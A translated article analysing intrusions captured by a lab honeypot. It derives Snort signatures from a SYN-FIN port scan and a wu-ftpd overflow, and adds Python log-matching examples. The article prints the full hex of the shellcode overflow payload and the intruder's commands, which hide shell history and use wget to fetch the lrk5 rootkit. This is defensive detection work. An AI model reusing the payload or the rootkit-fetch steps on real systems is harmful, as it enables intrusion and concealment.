Honeypot advanced Hit @ me Intrusion Analysis

Source: Internet
Author: User
Tags: ftp, login

I recently read through the PPTP documents and happened upon the pptp-faq on www.couterpane.com, which turned out to be very interesting. Roughly, it says: "Microsoft's PPTP implementation is very bad; six vulnerabilities in it allow an attacker to sniff passwords off the network, break into the encrypted channel, obtain protected data, and mount DoS attacks against PPTP. The PPTP protocol itself is very secure, but the PPTP implemented by Microsoft is a pile of garbage. Bruce Schneier and Mudge recommend replacing Microsoft's junk with IPsec." The security products of the world's largest software company contain such naive errors. Surrounded by this many security products, can we really feel secure?

So we have to test for ourselves. Building a honeypot system that hosts virtual implementations of various operating systems and related products, simulating real network services in order to trap attacks, has become the best way to understand security vulnerabilities, become familiar with intrusion techniques, and study defensive policies. Intrusion data analysis has therefore become something of a fashion.

Hit @ me, the honeypot, has now been running for half a month, and various attacks have been tested against it in the lab environment (because an intrusion unfolds over time, I invited two assistants to carry out a range of attack experiments against the honeypot so that the intrusion data could be collected in full). I gathered a lot of interesting data. To keep the analysis lively, I will walk through intrusions into different operating systems and evaluate the digital features of each intrusion step.

Linux intrusion digital analysis

Port scan digital features

ACID's console shows a large number of "IDS441/scan_probe-Synscan-Portscan" records whose target IP address is the simulated Red Hat 7.1 system. From the name alone we can guess that the record is a SYN TCP port scan against that system. To understand its digital features clearly, I captured several packet records:

05/13-17:54:10.623674 192.168.1.244:117 -> 192.168.1.250:117
TCP TTL:42 TOS:0x0 ID:39426
**SF*** Seq: 0x55A0EF7B Ack: 0x40F9DC84 Win: 0x404

05/13-17:54:10.623674 192.168.1.244:118 -> 192.168.1.250:118
TCP TTL:42 TOS:0x0 ID:39426
**SF*** Seq: 0x6E42083A Ack: 0x4F07A60B Win: 0x404

Analysis of the TCP/IP headers reveals some interesting phenomena:

1. The Identification field in the IP header is always 39426.

2. The TCP source port is always the same as the destination port.

3. SYN and FIN are always set together in the TCP flags.

4. The window size is always 0x404.

As everyone knows, a packet with SYN set is the SYN segment sent to the target port: if the target answers with SYN/ACK, the port is inferred to be listening; if it answers with RST/ACK, the port is not open. A packet with FIN set makes the target system return an RST for a closed port (see RFC 793 for details). All signs point to the system having been subjected to a stealthy half-open scan.

Conclusion: the SYN-FIN digital feature appears in port scanning events. The IP ID of this scan packet is 39426, and another notable feature is the window size of 0x404. When I checked the Snort rule repository, the signature reads as follows:

alert tcp $EXTERNAL any -> $INTERNAL any (msg: "IDS441/scan_probe-Synscan-Portscan"; id: 39426; flags: SF; classtype: info-attempt; reference: arachnids,441;)

(Note: by analyzing packet structure in this way, we can easily define our own intrusion detection signatures and add them to the Snort rule set.)
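
As an added example (not part of the original article), the following Python parses records in the Snort text-log format shown above and flags the four features identified in the list; the sample records are constructed from the two captures on this page plus one ordinary SYN to port 21 as a control.

```python
import re

# Constructed sample in Snort's text-log format: the two Synscan records from the
# article plus one ordinary SYN to port 21 as a control (not a real capture).
LOG = """\
05/13-17:54:10.623674 192.168.1.244:117 -> 192.168.1.250:117
TCP TTL:42 TOS:0x0 ID:39426
**SF**** Seq: 0x55A0EF7B Ack: 0x40F9DC84 Win: 0x404
05/13-17:54:10.623674 192.168.1.244:118 -> 192.168.1.250:118
TCP TTL:42 TOS:0x0 ID:39426
**SF**** Seq: 0x6E42083A Ack: 0x4F07A60B Win: 0x404
05/13-17:55:02.100000 192.168.1.18:1045 -> 192.168.1.250:21
TCP TTL:64 TOS:0x10 ID:31580 DF
**S***** Seq: 0x1A2B3C4D Ack: 0x0 Win: 0x7FB8
"""

HDR = re.compile(r"^\S+ (\d+\.\d+\.\d+\.\d+):(\d+) -> (\d+\.\d+\.\d+\.\d+):(\d+)$")
IPL = re.compile(r"^TCP TTL:\d+ TOS:0x[0-9A-Fa-f]+ ID:(\d+)")
TCPL = re.compile(r"^(\S+) Seq: 0x[0-9A-Fa-f]+ Ack: 0x[0-9A-Fa-f]+ Win: 0x([0-9A-Fa-f]+)$")


def parse_records(text):
    """Group each three-line record into a dict; skip anything that does not parse."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    records = []
    for i in range(0, len(lines) - 2, 3):
        h, ip, tcp = HDR.match(lines[i]), IPL.match(lines[i + 1]), TCPL.match(lines[i + 2])
        if not (h and ip and tcp):
            continue
        records.append({
            "src": h.group(1), "sport": int(h.group(2)),
            "dst": h.group(3), "dport": int(h.group(4)),
            "ipid": int(ip.group(1)),
            # Keep only the flag letters; their column order differs between Snort versions.
            "flags": set(tcp.group(1).replace("*", "")),
            "win": int(tcp.group(2), 16),
        })
    return records


def is_synscan(rec):
    """All four features from the analysis: SYN+FIN only, IP ID 39426,
    window 0x404, and source port equal to destination port."""
    return (rec["flags"] == {"S", "F"} and rec["ipid"] == 39426
            and rec["win"] == 0x404 and rec["sport"] == rec["dport"])


def synscan_hits(text):
    """Return (source IP, scanned port) for every record matching the signature."""
    return [(r["src"], r["dport"]) for r in parse_records(text) if is_synscan(r)]


if __name__ == "__main__":
    for src, port in synscan_hits(LOG):
        print(f"IDS441 Synscan probe from {src} to port {port}")
```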

FTP remote overflow digital features

Continuing to watch ACID's output, I found the following intrusion detection record for port 21 of the RH7.1 system: "IDS287/ftp_ftp-wuftp260-venglin-linux". This points to the wu-ftpd vulnerability in RH7.1, where an overly long password or user name causes a remote overflow. I have no doubt that SecurityFocus hosts more than one exploit for this vulnerability!

For an overflow attack like this, what data do we need to capture to recognize the intrusion? The common line of thinking is: intercept the long password the intruder enters, and trigger the intrusion detection record when its length exceeds a certain limit. There is a problem with this, though: there is more than one exploit program, and their overflow password strings all differ. How can we define a single digital feature for all of them? I therefore became very interested in collecting the server's feedback after the overflow, which is a far better idea! To confirm this and analyze how the vulnerability is exploited, I captured the following packet:

05/14-01:25:38.420608 192.168.1.18:1968 -> 192.168.1.250:21
TCP TTL:64 TOS:0x10 ID:31579 DF
****PA* Seq: 0x6BF2C954 Ack: 0xE69A711B Win: 0x7FB8
TCP Options => NOP TS: 58495044 3110955
50 41 53 53 20 90 90 90 90 90 90 90 90  PASS...........
90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 31 C0 31 DB 31  ......1.1.1
C9 B0 46 CD 80 31 C0 31 DB 43 89 D9 41 B0 3F CD  ..F..1.1.c..a.?.
80 EB 6B 5E 31 C0 31 C9 8D 5E 01 88 46 04 66 B9  ..k^1.1..^..F.f.
FF 01 B0 27 CD 80 31 C0 8D 5E 01 B0 3D CD 80  ......1......^..
31 C0 31 DB 8D 5E 08 89 43 02 31 C9 FE C9 31 C0  1.1...^...C.1.1.
8D 5E 08 B0 0C CD 80 FE C9 75 F3 31 C0 88 46 09  .^......u.1..F.
8D 5E 08 B0 3D CD 80 FE 0E B0 30 FE C8 88 46 04  .^...=...0...F.
31 C0 88 46 07 89 76 08 89 46 0C 89 F3 8D 4E 08  1..F..v..F...N.
8D 56 0C B0 0B CD 80 31 C0 31 DB B0 01 CD 80 E8  .V.....1......
90 FF 30 62 69 6E 30 73 68 31 2E  ......0bin0sh1.
2E 31 31 0D 0A  .11..

From the intercepted FTP login packet we can see that at password verification time (that is, after the PASS command) a very long password was entered (sending a suitable shellcode, as a program of the wu-lnx.c type does, successfully overflows wu-ftpd). If the server returns the hexadecimal sequence 31c031db 31c9b046 cd80 31c031db (shown as "1.1.1..F..1.1." in the ASCII column above), the intruder then obtains a remote root /bin/sh.

Because the server's overflow response carries no data offset, that is, the data offset is zero, we obtain another Snort intrusion signature rule:

alert tcp $EXTERNAL any -> $INTERNAL 21 (msg: "IDS287/ftp_ftp-wuftp260-venglin-linux"; flags: A+; content: "|31c031db 31c9b046 cd80 31c031db|"; classtype: system-attempt; reference: arachnids,287;)
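
As an added example (not from the original article or from Snort itself), the Python below decodes a Snort content: option with a |hex| section and applies the IDS287 match, including the A+ flag modifier, to constructed payloads; it shows why the byte-sequence feature separates the overflow from a merely long password, which the length-only check discussed above cannot do.

```python
# Added example, not from the original article or Snort itself: decode a Snort
# content: option with a |hex| section and apply the IDS287 match to constructed
# payloads, using the A+ flag semantics (ACK required, other flags allowed).


def parse_content(option):
    """Text outside |...| is literal; inside it is hex with whitespace ignored."""
    out = bytearray()
    for i, part in enumerate(option.split("|")):
        out += bytes.fromhex(part) if i % 2 else part.encode("latin-1")
    return bytes(out)


def flags_match(rule_flags, pkt_flags):
    """'A+' means ACK plus anything; without '+' the flag set must match exactly."""
    required = set(rule_flags.rstrip("+"))
    if rule_flags.endswith("+"):
        return required <= pkt_flags
    return required == pkt_flags


IDS287_CONTENT = parse_content("|31c031db 31c9b046 cd80 31c031db|")


def matches_ids287(dport, pkt_flags, payload):
    """The rule from the text: port 21, flags A+, signature bytes anywhere in the payload."""
    return dport == 21 and flags_match("A+", pkt_flags) and IDS287_CONTENT in payload


def long_password(payload, limit=100):
    """The length-only heuristic the article rejects, kept here for comparison."""
    return payload.startswith(b"PASS ") and len(payload) - 5 > limit


# Constructed payloads: the signature bytes behind a NOP sled, versus a long
# password that contains no shellcode at all.
OVERFLOW_LOGIN = b"PASS " + b"\x90" * 200 + IDS287_CONTENT + b"\r\n"
LONG_PASSWORD = b"PASS " + b"A" * 300 + b"\r\n"

if __name__ == "__main__":
    for name, p in (("overflow", OVERFLOW_LOGIN), ("long password", LONG_PASSWORD)):
        print(name, "IDS287:", matches_ids287(21, {"P", "A"}, p),
              "length rule:", long_password(p))
```

The length rule fires on both payloads, while the content rule fires only on the one carrying the overflow bytes.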

Comprehensive intrusion digital analysis

Once intruders gain control of a system through port scanning and exploitation, what do they do next? In many movie plots the burglar breaks into someone's house, hides things in inconspicuous corners, and then pins the blame on someone else. Carrying this kind of thinking over to the Internet has become reality!

Through packet monitoring and tracking I found the intruders running many very interesting commands. To illustrate their methods, I sorted out their handiwork from the captured packets and added comments to the relevant commands:

# unset HISTFILE; id; uname -a
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Linux res 2.4.7-4 #1 Thu Sep 6 17:27:27 EDT 2001 i686 unknown

/* The intruder unsets the HISTFILE environment variable so that the shell does not record the commands used;
 * checks the id to confirm the exploit succeeded and root privileges were obtained;
 * views the environment of the compromised system */

# mkdir /var/tmp/...
# cd /var/tmp/...
# wget http://packetstormsecurity.org/U... its/lrk5.src.tar.gz
